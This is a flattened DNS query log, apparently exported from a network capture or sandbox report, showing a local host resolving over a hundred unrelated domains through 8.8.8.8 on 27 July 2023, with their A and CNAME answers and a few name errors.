                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:17.653402090 CEST8.8.8.8192.168.2.40xbf2cNo error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:17.653402090 CEST8.8.8.8192.168.2.40xbf2cNo error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:19.471555948 CEST8.8.8.8192.168.2.40xabb5No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:19.471555948 CEST8.8.8.8192.168.2.40xabb5No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:19.614713907 CEST8.8.8.8192.168.2.40x225fNo error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:22.687355995 CEST8.8.8.8192.168.2.40x8865No error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:22.687355995 CEST8.8.8.8192.168.2.40x8865No error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:22.695034981 CEST8.8.8.8192.168.2.40x7814No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:23.296058893 CEST8.8.8.8192.168.2.40x5a92No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:23.393115044 CEST8.8.8.8192.168.2.40x8466No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:23.393115044 CEST8.8.8.8192.168.2.40x8466No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:23.980222940 CEST8.8.8.8192.168.2.40xeb18No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:26.989599943 CEST8.8.8.8192.168.2.40xbabdNo error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.567238092 CEST8.8.8.8192.168.2.40xc87No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.567238092 CEST8.8.8.8192.168.2.40xc87No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.575217962 CEST8.8.8.8192.168.2.40xbb17No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.575217962 CEST8.8.8.8192.168.2.40xbb17No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.610471010 CEST8.8.8.8192.168.2.40x3ee9No error (0)www.ftchat.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.610471010 CEST8.8.8.8192.168.2.40x3ee9No error (0)www.ftchat.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.622962952 CEST8.8.8.8192.168.2.40xeaeNo error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.622962952 CEST8.8.8.8192.168.2.40xeaeNo error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.623836040 CEST8.8.8.8192.168.2.40xfe9dNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.627016068 CEST8.8.8.8192.168.2.40x955No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.627016068 CEST8.8.8.8192.168.2.40x955No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.706383944 CEST8.8.8.8192.168.2.40xd217No error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.712563992 CEST8.8.8.8192.168.2.40xcc74No error (0)www.pdqhomes.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.712563992 CEST8.8.8.8192.168.2.40xcc74No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.712563992 CEST8.8.8.8192.168.2.40xcc74No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.712563992 CEST8.8.8.8192.168.2.40xcc74No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.832422972 CEST8.8.8.8192.168.2.40x10e1No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.857491016 CEST8.8.8.8192.168.2.40x4dc5No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.857491016 CEST8.8.8.8192.168.2.40x4dc5No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.014322996 CEST8.8.8.8192.168.2.40xc1ceNo error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.014322996 CEST8.8.8.8192.168.2.40xc1ceNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.014322996 CEST8.8.8.8192.168.2.40xc1ceNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.019783974 CEST8.8.8.8192.168.2.40x7e44No error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.019783974 CEST8.8.8.8192.168.2.40x7e44No error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.019783974 CEST8.8.8.8192.168.2.40x7e44No error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.025892973 CEST8.8.8.8192.168.2.40x970eNo error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.025892973 CEST8.8.8.8192.168.2.40x970eNo error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.025892973 CEST8.8.8.8192.168.2.40x970eNo error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.048064947 CEST8.8.8.8192.168.2.40x2aa4No error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.048064947 CEST8.8.8.8192.168.2.40x2aa4No error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.772155046 CEST8.8.8.8192.168.2.40x83d9No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.772155046 CEST8.8.8.8192.168.2.40x83d9No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.772155046 CEST8.8.8.8192.168.2.40x83d9No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.785655022 CEST8.8.8.8192.168.2.40x4f5cNo error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.790529013 CEST8.8.8.8192.168.2.40x7397No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.790529013 CEST8.8.8.8192.168.2.40x7397No error (0)ghs.googlehosted.com172.217.16.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.911092043 CEST8.8.8.8192.168.2.40x7718No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.236207962 CEST8.8.8.8192.168.2.40x237eName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.240926981 CEST8.8.8.8192.168.2.40x98c2No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.240926981 CEST8.8.8.8192.168.2.40x98c2No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.293661118 CEST8.8.8.8192.168.2.40xa224No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.293661118 CEST8.8.8.8192.168.2.40xa224No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.293661118 CEST8.8.8.8192.168.2.40xa224No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.325732946 CEST8.8.8.8192.168.2.40x3dcbNo error (0)www.petsfan.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.325732946 CEST8.8.8.8192.168.2.40x3dcbNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.325732946 CEST8.8.8.8192.168.2.40x3dcbNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.325732946 CEST8.8.8.8192.168.2.40x3dcbNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.404675007 CEST8.8.8.8192.168.2.40x3717No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.422982931 CEST8.8.8.8192.168.2.40x8527No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.422982931 CEST8.8.8.8192.168.2.40x8527No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.422982931 CEST8.8.8.8192.168.2.40x8527No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.477931023 CEST8.8.8.8192.168.2.40x336eNo error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.477931023 CEST8.8.8.8192.168.2.40x336eNo error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.929613113 CEST8.8.8.8192.168.2.40x2578No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:29.993587017 CEST8.8.8.8192.168.2.40xd5c7No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.124165058 CEST8.8.8.8192.168.2.40xee6dNo error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.148411036 CEST8.8.8.8192.168.2.40x6d07No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.148411036 CEST8.8.8.8192.168.2.40x6d07No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.448080063 CEST8.8.8.8192.168.2.40xc432No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.448080063 CEST8.8.8.8192.168.2.40xc432No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.469563007 CEST8.8.8.8192.168.2.40x5f95No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.469563007 CEST8.8.8.8192.168.2.40x5f95No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.700758934 CEST8.8.8.8192.168.2.40x87b2No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.700758934 CEST8.8.8.8192.168.2.40x87b2No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.700758934 CEST8.8.8.8192.168.2.40x87b2No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.845520020 CEST8.8.8.8192.168.2.40xc4fbNo error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.845520020 CEST8.8.8.8192.168.2.40xc4fbNo error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.854947090 CEST8.8.8.8192.168.2.40x3bccNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.854947090 CEST8.8.8.8192.168.2.40x3bccNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:30.926501036 CEST8.8.8.8192.168.2.40x306fNo error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.020468950 CEST8.8.8.8192.168.2.40x206fNo error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.020468950 CEST8.8.8.8192.168.2.40x206fNo error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.509479046 CEST8.8.8.8192.168.2.40xb244Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.528681993 CEST8.8.8.8192.168.2.40xbff8No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.528681993 CEST8.8.8.8192.168.2.40xbff8No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.569823027 CEST8.8.8.8192.168.2.40x1c2eNo error (0)www.cokocoko.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.569823027 CEST8.8.8.8192.168.2.40x1c2eNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.569823027 CEST8.8.8.8192.168.2.40x1c2eNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.569823027 CEST8.8.8.8192.168.2.40x1c2eNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.584587097 CEST8.8.8.8192.168.2.40xc573No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.620775938 CEST8.8.8.8192.168.2.40x9f61No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.623404026 CEST8.8.8.8192.168.2.40xd607No error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.623404026 CEST8.8.8.8192.168.2.40xd607No error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.626219988 CEST8.8.8.8192.168.2.40x140dNo error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.626219988 CEST8.8.8.8192.168.2.40x140dNo error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.658901930 CEST8.8.8.8192.168.2.40x56ceNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.944799900 CEST8.8.8.8192.168.2.40xb137No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:31.944799900 CEST8.8.8.8192.168.2.40xb137No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.276523113 CEST8.8.8.8192.168.2.40xb824No error (0)www.netcr.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.276523113 CEST8.8.8.8192.168.2.40xb824No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.276523113 CEST8.8.8.8192.168.2.40xb824No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.276523113 CEST8.8.8.8192.168.2.40xb824No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.318214893 CEST8.8.8.8192.168.2.40xd0e1Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.572349072 CEST8.8.8.8192.168.2.40xf7e1No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.579505920 CEST8.8.8.8192.168.2.40x7c78No error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.579505920 CEST8.8.8.8192.168.2.40x7c78No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.581223965 CEST8.8.8.8192.168.2.40xd911No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.733442068 CEST8.8.8.8192.168.2.40x9404No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.733442068 CEST8.8.8.8192.168.2.40x9404No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.895397902 CEST8.8.8.8192.168.2.40x9dadNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.982240915 CEST8.8.8.8192.168.2.40x5085No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:32.982240915 CEST8.8.8.8192.168.2.40x5085No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.275342941 CEST8.8.8.8192.168.2.40xa8a6No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.296283007 CEST8.8.8.8192.168.2.40xb3b4No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.296283007 CEST8.8.8.8192.168.2.40xb3b4No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.296283007 CEST8.8.8.8192.168.2.40xb3b4No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.296283007 CEST8.8.8.8192.168.2.40xb3b4No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.296283007 CEST8.8.8.8192.168.2.40xb3b4No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.296283007 CEST8.8.8.8192.168.2.40xb3b4No error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.314687014 CEST8.8.8.8192.168.2.40xcc91No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.323458910 CEST8.8.8.8192.168.2.40x2ca5No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.428939104 CEST8.8.8.8192.168.2.40x81f1No error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.435513973 CEST8.8.8.8192.168.2.40xd197No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.435513973 CEST8.8.8.8192.168.2.40xd197No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.442442894 CEST8.8.8.8192.168.2.40x7469No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.451847076 CEST8.8.8.8192.168.2.40xeb88No error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.453582048 CEST8.8.8.8192.168.2.40x7322No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.453582048 CEST8.8.8.8192.168.2.40x7322No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.459080935 CEST8.8.8.8192.168.2.40x41f6No error (0)www.ftchat.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.459080935 CEST8.8.8.8192.168.2.40x41f6No error (0)www.ftchat.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.471815109 CEST8.8.8.8192.168.2.40x9853No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.471815109 CEST8.8.8.8192.168.2.40x9853No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.485157967 CEST8.8.8.8192.168.2.40x40dfNo error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.485157967 CEST8.8.8.8192.168.2.40x40dfNo error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.540685892 CEST8.8.8.8192.168.2.40xb716No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.540685892 CEST8.8.8.8192.168.2.40xb716No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.568696022 CEST8.8.8.8192.168.2.40x1c2eNo error (0)www.cokocoko.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.568696022 CEST8.8.8.8192.168.2.40x1c2eNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.568696022 CEST8.8.8.8192.168.2.40x1c2eNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.568696022 CEST8.8.8.8192.168.2.40x1c2eNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.793843031 CEST8.8.8.8192.168.2.40x9906No error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.793843031 CEST8.8.8.8192.168.2.40x9906No error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.793843031 CEST8.8.8.8192.168.2.40x9906No error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.797945976 CEST8.8.8.8192.168.2.40xf069No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.797945976 CEST8.8.8.8192.168.2.40xf069No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.797945976 CEST8.8.8.8192.168.2.40xf069No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:33.850790977 CEST8.8.8.8192.168.2.40xcddaNo error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
